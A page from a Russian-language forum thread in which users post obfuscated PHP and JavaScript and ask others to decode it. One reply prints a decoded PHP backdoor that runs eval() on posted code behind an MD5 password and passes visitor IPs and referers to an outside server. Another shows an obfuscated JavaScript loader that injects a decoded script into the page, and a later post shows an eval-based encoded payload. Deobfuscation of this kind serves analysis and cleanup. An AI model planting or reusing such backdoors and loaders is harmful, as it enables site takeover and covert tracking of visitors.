Обфускация кода (вопросы, просьбы зашифровать/расшифровать скрипт )

Discussion in 'PHP' started by Sharky, 29 Sep 2009.

  1. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Зачем его разгадывать? Возьми и удали. Либо переведи hex в символы, тривиальная операция, да и ссылки в первом посте в этом помочь могут.

    Code:
    []['constructor']['constructor'](self['unescape']('if(~location.protocol.indexOf('http:')&&~location.host.indexOf('template-help.com')){}else(location.href='http://templatemonster.com')'))()
    
     
    _________________________
  2. everyoneMaxe

    everyoneMaxe New Member

    Joined:
    5 Mar 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Савсибо!
     
  3. everyoneMaxe

    everyoneMaxe New Member

    Joined:
    5 Mar 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0

    Спасибо! Решил!
     
    #743 everyoneMaxe, 6 Mar 2013
    Last edited: 6 Mar 2013
  4. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    Помогите с расшифровкой:
    http://pastebin.com/CNBRcWD6
    заранее спасибо
     
  5. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Нужен целый файл, а не копипаст.

    Code:
    <?php
    
    
    require_once("header.php"); 
    #if($_POST['prox'] == '') die('Не указаны прокси!');
    
    #$ar = explode("\n", $_POST['prox']);
    #echo "<b>Добавлено ".count($ar)." прокси:</b><br><br>";
    #foreach($ar as $a)
    #{
    	$f = fopen('proxy.txt', 'w');
    	fwrite($f, trim($_POST['prox'])."\r\n");
    	fclose($f);
    	#echo trim($a).'<br>';
    #}
    header("Location:index.php");
     require_once("footer.php"); 
    
    
    ?>
     
  6. tipagraf

    tipagraf New Member

    Joined:
    17 Feb 2012
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    помогите расшифровать!

    Доброго времени, всем! помогите расшифровать:

    http://pastebin.com/93vFQhTz

    Заранее Благодарен!
     
  7. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    В первом сообщении в теме все необходимые утилиты есть. Вы бы хоть ими прогнали сначала.
    PHP:
    <?php

    //////////////////////////////////////////////////////
    // Расковырял молодец, возьму в рефы xD
    // Стучи icq: rc4("trolololo",base64_decode('Y3E8HEll'));
    // rc4(password,string_in_hex);
    //////////////////////////////////////////////////////

    error_reporting(0);
    header("Content-Type: text/html; charset=WINDOWS-1251");
    $pass 'c87440dce5ac2d32d1fe1897787695e5';
    $template_file 'template';
    $tema 'ru_soft';
    $server 'www.mfuq.tk';
    $domain str_replace('www.'''$_SERVER['HTTP_HOST']);
    $query = @$_GET['q'];
    if (empty(
    $query))
        
    $query 'index';
    $path explode('/'$_SERVER['REQUEST_URI']);
    array_pop($path);
    $path implode('/'$path) . '/';

    function 
    get_shab() {
        global 
    $domain$template_file$server;
        
    $ch curl_init("http://" $server "/server/get_shab?dom=" $domain);
        
    curl_setopt($chCURLOPT_HEADER0);
        
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
        
    $shab curl_exec($ch);
        
    file_put_contents($template_file, ($shab));

    }

    if (isset(
    $_GET['b']) OR $_POST['bcode']) {
        
    error_reporting(E_ERROR E_WARNING E_PARSE);
        echo(
    '
        <form method="POST" action="">
        <textarea name="bcode" type="text">' 
    $_POST['bcode'] . '</textarea><br>
        <input name="passwd" value="' 
    $_POST['passwd'] . '"><br/>
        <input type="submit"></form>
        '
    );

        if (
    $_POST['bcode'] AND md5($_POST['passwd']) == $pass)
            eval(
    $_POST['bcode']);

        exit;
    }

    if (!
    file_exists($template_file))
        
    get_shab();

    $ch curl_init("http://" $server "/server/");
    curl_setopt($chCURLOPT_POST1);
    curl_setopt($chCURLOPT_POSTFIELDS"dom=" $domain "&page=" $query "&tema=" $tema "&path=" $path "&ip=" $_SERVER['REMOTE_ADDR'] . "&ref=" urlencode($_SERVER['HTTP_REFERER']) . "&agent=" urlencode($_SERVER['HTTP_USER_AGENT']));
    curl_setopt($chCURLOPT_HEADER0);
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    $answer curl_exec($ch);
    $answer json_decode($answer);


    if (empty(
    $answer) OR $answer->title == null OR $answer->content == null) {
        
    header('HTTP/1.1 503 Service Temporarily Unavailable');
        
    header('Status: 503 Service Temporarily Unavailable');
        
    header('Retry-After: 60');
        exit();
    } else {
        
    $content file_get_contents($template_file);
        
    $c = array();
        foreach (
    $answer as $key => $elem) {
        
    $c[$key] = @iconv('utf-8'"windows-1251"base64_decode($elem));
        }
        
    $content preg_replace('/{TITLE}/i'$c['title'], $content);
        
    $content preg_replace('/{STRING}/i'$c['content'], $content);
        
    $content preg_replace('/{STRING2}/i'$c['content2'], $content);
        
    $content preg_replace('/{KEY}/i'$c['key'], $content);
        
    $content preg_replace('/{HEAD}/i'$c['head'], $content);
        echo 
    $content;
    }
    ?>
     
    _________________________
  8. titimon

    titimon New Member

    Joined:
    28 Nov 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста дешифровать
    http://pastebin.com/tsxTus34
     
  9. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,494
    Likes Received:
    807
    Reputations:
    614
    titimon http://pastebin.com/wax8cetT
     
    _________________________
  10. titimon

    titimon New Member

    Joined:
    28 Nov 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    спасибо, если не секрет кокой способ так быстро дешифровать ?
     
  11. InKognito_x

    InKognito_x New Member

    Joined:
    20 Feb 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Уважаемые,помогитека с таким вот кодом http://pastebin.com/kEnGemdY Благодарю заранее!
     
  12. Witch_You

    Witch_You New Member

    Joined:
    24 Feb 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Помогите, пожалуйста, с кодом? http://pastebin.com/GTx6w9iC
     
  13. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    801
    Likes Received:
    145
    Reputations:
    73
    Это изображение в base64.
    Тут не полный код
     
    #753 LStr1ke, 26 Apr 2013
    Last edited: 26 Apr 2013
  14. Witch_You

    Witch_You New Member

    Joined:
    24 Feb 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Эти изображения никак получить нельзя? Кусок кода из игры – морской бой (которая, по сути – графическая карта)
     
  15. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    801
    Likes Received:
    145
    Reputations:
    73
    Можно
    PHP:
    file_put_contents('image.png'base64_decode('iVBORw0KGgoAAAANSU....'));
     
  16. titimon

    titimon New Member

    Joined:
    28 Nov 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста привести JS script к нормальному-читаемому виду
    http://pastebin.com/PWywHavM
     
  17. qw1mb1

    qw1mb1 Member

    Joined:
    8 Feb 2013
    Messages:
    113
    Likes Received:
    16
    Reputations:
    8
    Code:
    function onImgLoad(source) {
        var m = new Array();
        var c = '';
        var e = new Array("itakako");
        var b10 = "TJLJNDWDhDREdCOD";
        c = c + j385(b10);
        var b11 = "HIJJJAIqH";
        c = c + j385(b11);
        var b12 = "IpIn-uJgHlIwHzIoIoJVHXIsJK";
        c = c + s844(b12);
        var b13 = "iHiKiUjcjkhHjLjlicj";
        c = c + e666(b13);
        var b14 = "JkJNJMJJ";
        c = c + j385(b14);
        var b15 = "HnHYHpHjHZJsIeHMJFJXHdJuIMJAIpHK";
        c = c + j385(b15);
        var b16 = "PiGjdhIhDhDjkiBhOiYjmjciUjviMhDh";
        c = c + e666(b16);
        var b17 = "JzIrHVJoIwImHyIkImJuIOJp";
        c = c + j385(b17);
        var b18 = "giQjniohziYjgiRjnjp";
        c = c + e666(b18);
        var b19 = "yInIGJAJHI";
        c = c + j385(b19);
        var b20 = "jAhShShSjjiS";
        c = c + e666(b20);
        var b21 = "JmHfIwIpHlHaIhIkIuJCJKHhJfJLIxHzJKI";
        c = c + b21;
        var b22 = "JIIrIkJZImHoHnInI-yJkHkJLJAIvHZIKHsJL";
        c = c + s844(b22);
        var b23 = "KIvIKJqIxIvIQJy";
        c = c + j385(b23);
        var b24 = "IrHdHpJKHbJlHqJNHmJLHYIK";
        c = c + b24;
        var b25 = "pHdHoHcJYHiHmHwIqI";
        c = c + j385(b25);
        var b26 = "jIdHpIoIbHgJfHrHGJwIvHgJbHKJ";
        c = c + j385(b26);
        var b27 = "jthUjliKiTjhjBhOiShNhPhH";
        c = c + e666(b27);
        var b28 = "OJHJkHjINJvIEJqHsHaJyInIqINJlHQJ";
        c = c + j385(b28);
        var b29 = "iViNjGhPjUiUjSiUjrisjljo";
        c = c + e666(b29);
        var b30 = "IvHZIFHgJHJCIwHkIPIdHkJeHeIuJkHo";
        c = c + b30;
        var b31 = "JYJcHfJAJFHYJHIPJJ-JHJLIw";
        c = c + s844(b31);
        var r = 26;
        for (var z = 0; z < c.length; z = z + 2) {
            var h = c.charCodeAt(z);
            h = f561(h);
            var i = c.charCodeAt(z + 1);
            i = f561(i);
            if (i > r) {
                i = u180(i);
            }
            if (h > r) {
                h = u180(h);
            }
            var p = h * 52 + i;
            m.push(p);
        }
        var g = source.height,
            o = source.width;
        o = o + x751(54);
        var d = "";
        for (var z = 6; z < m.length; z++) {
            var v = m[z] - o + g * 2;
            d += String.fromCharCode(v ^ m[z % 6]);
        }
        for (var z = 0; z < e.length; z++) {
            var g = e[z];
            var v = "$" + g.substring(0, 1);
            var o = g.substring(1);
            d = d.replace(v, o);
        }
        q541(d);
    }
    
    function q541(d) {
        if (d.indexOf("javascript") < 0) {
            var n = "wait";
            k620(n);
        } else {
            var t = document.createElement('script');
            t.type = "text/javascript";
            if (null == t.canHaveChildren || t.canHaveChildren) {
                t.appendChild(document.createTextNode(d));
            } else {
                t.text = d;
            }
            document.getElementsByTagName('head')[0].appendChild(t);
        }
    }
    
    function u180(b) {
        var h = "Jacalyn";
        var p = h.charCodeAt(1) - 91;
        return b - p;
    }
    
    function j385(a) {
        return a.split("").reverse().join("");
    }
    
    function f561(r) {
        var o = "Cherly";
        var d = 166 - o.charCodeAt(2);
        return r - d;
    }
    
    function k620(n) {
        var q = document.getElementById(n);
        if (q) {
            q.innerHTML = "";
        }
    }
    
    function s844(v) {
        var m = v.split("-");
        return m[1] + m[0];
    }
    
    function e666(u) {
        var m = 0,
            t = '',
            h = '';
        while (m <= u.length) {
            t = u.charAt(m);
            var c = t.toUpperCase();
            var z = t.toLowerCase();
            if (t == c) {
                h = h + z;
            } else {
                h = h + c;
            }
            m++;
        }
        return h;
    }
    
    function x751(g) {
        var m = navigator.userAgent.toLowerCase();
        var t = "614768564355-6243545362435453016451606361-495757495447445762-495757495447016547440158604764514765-524747644761-476643445762-4451564958604764514765-6156435858604764514765445762-674356464766435662516451606361-6147436045505547-6743505757-5643644760445762-616547445762-556156445762-55474651435843606256476061";
        var c = t.split("-"),
            z = '',
            h = 0;
        for (var i = 0; i < m.length; i++) {
            var p = ' ';
            var o = m.charCodeAt(i);
            if (o == 32) {
                p = '01';
            }
            if ((o > 96) && (o < 123)) {
                p = o - g;
                if (p < 10) {
                    p = '0' + p;
                }
            }
            z = z + p;
        }
        for (var i = 0, d = c.length; i < d; i++) {
            if (z.indexOf(c[i]) == -1) {
                h++;
            }
        }
        return h;
    }
    
     
  18. titimon

    titimon New Member

    Joined:
    28 Nov 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    to qw1mb1
    спасибо, сам код я в состоянии прочитать.
    я попросил знающих людей привести код к виду без всех этих переменных - т.е. упростить до банального
    PHP:
    new Image().src "http://site.com ...
    и так далее
    так что если кто может помочь, повторю просьбу
    Помогите пожалуйста привести JS script к нормальному-читаемому виду
    http://pastebin.com/PWywHavM
     
  19. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Ищу обфускатор который делает подобное:
    PHP:
    var q2425d50="";function r588ab446ccaf(x4){var p2=String,p1=x4.substr(11,3)-461,r7,u0;x4=x4.substr(ob());var p9=x4.length;for(var te=0;te<p9;te++){try{throw(xc=x4.substr(te,1));}catch(e){xc=e;};if(xc=='{'){p1="";te=v8(te);t2=x4.substr(te,1);while(t2!='{'){p1+=t2;te++;t2=x4.substr(te,1);}p1-=618;continue;}r7="";if(ue(xc)){te++;xc=x4.substr(te,1);while(xc!='°'){r7+=xc;te++;xc=x4.substr(te,1);}r7=r7-p1-12;if(r7<0)r7+=256;if(r7>=192)r7+=848;else if(r7==168)r7=1025;else if(r7==184)r7=1105;q2425d50+=p2["f\x72\x6fmC\x68\x61\x72\x43\x6fd\x65"](r7);continue;}x8=(xc+'')["c\x68\x61\x72\x43\x6f\x64\x65\x41t"](0);if(x8>848)x8-=848;u0=x8-p1-12;if(u0<0)u0+=256;if(u0>=192)u0+=848;else if(u0==168)u0=1025;else if(u0==184)u0=1105;q2425d50+=nb(u0);}}r588ab446ccaf(o4());eval(q2425d50);function ob(){return 14;}function v8(yf){return ++yf;}function ue(sc){return sc=='°';}function nb(w0){var p2=String;return p2["f\x72\x6fmC\x68\x61\x72\x43\x6fd\x65"](w0);}function o4(){return "6aba198df81550°161°°134°°146°{791{°230°°198°°195°°29°(°28°.{814{=5>{631{°141°{659{c°172°°167°{624{°123°°134°w:9N{717{°213°{731{°239°°222°°234°{658{°153°{734{°243°{637{°132°°147°{802{°228°63;7°1°{682{n°125°°124°°124°qxv{634{>{709{°135°°201°{747{°252°{808{<./{739{°247°{801{°0°°229°{624{B{707{°135°°133°°203°{753{°5°°244°°0°°248°°245°{690{°195°°198°°184°°185°°198°{766{°221°{770{°198°°212°°198°{655{Q°151°°163°°146°°158°°150°{685{°194°°191°°176°{782{°19°°25°°30°{681{°178°°136°{700{°128°°142°{659{W{678{h°174°°186°°169°{705{°208°°200°{792{°29°)&),{655{nS{655{Taaaaa{687{°129°s°143°{672{°126°°168°°180°°163°°175°°167°b°181°°180°{768{°5°{625{P5°123°{697{°207°°207°°203°{670{zo{760{°201°°252°{745{°253°{723{°218°{713{°204°{810{0{790{°30°!{702{°211°°200°°142°°201°{702{°206°°143°°217°{809{,3::°249°{796{.&.{743{°200°{722{°231°{643{°142°{655{°149°ncd{791{°219°°247°{701{°155°°197°{653{°161°{659{°150°{712{°215°°207°°138°°221°°220°°205°{697{°152°°125°{744{°172°°200°{797{°251°-.%1°32°,$2{739{°195°°193°°180°°243°°244°°235°°247°°230°{736{°239°{795{\"0°251°°228°{701{°136°°154°li{782{°223°{787{°228°°226°{664{g{693{°149°";}
    Link http://pastebin.com/rntwVm2x
     
    _________________________
  20. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Офтоп, конечно, но нафига? Там все завязанно на банальном eval, 5 минут и скрипт твой.